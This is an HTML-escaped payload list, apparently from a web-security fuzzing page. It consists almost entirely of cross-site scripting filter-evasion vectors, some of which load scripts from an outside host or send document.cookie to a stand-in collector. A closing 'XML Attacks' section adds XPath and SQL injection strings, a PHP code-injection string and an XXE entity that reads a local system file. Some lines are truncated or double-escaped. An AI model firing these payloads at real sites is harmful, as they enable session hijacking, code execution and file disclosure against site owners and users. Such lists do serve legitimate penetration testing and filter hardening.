&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo '&amp;amp;lt;SCR'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;'&amp;quot;&amp;quot;--&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;? echo('&amp;amp;lt;SCR)';echo('IPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;');&amp;amp;nbsp;?&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Set-Cookie&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HEAD&amp;amp;gt;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;CONTENT-TYPE&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;quot;&amp;amp;gt; &amp;amp;lt;/HEAD&amp;amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT =&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&amp;quot; '' SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT &amp;quot;&amp;quot;a='&amp;amp;gt;'&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=`&amp;amp;gt;` SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT a=&amp;quot;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT&amp;amp;gt;document.write(&amp;quot;&amp;quot;&amp;amp;lt;SCRI&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;PT SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://66.102.7.147/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://1113982867/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;h\ntt\tp://6&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//www.google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;//google&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://google.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.google.com./&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;A HREF=&amp;quot;&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;quot;&amp;amp;gt;XSS&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;input type=&amp;quot;&amp;quot;image&amp;quot;&amp;quot; dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;bgsound src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;amp;amp;{document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);};&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;link rel=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; href=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;iframe src=&amp;quot;&amp;quot;vbscript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
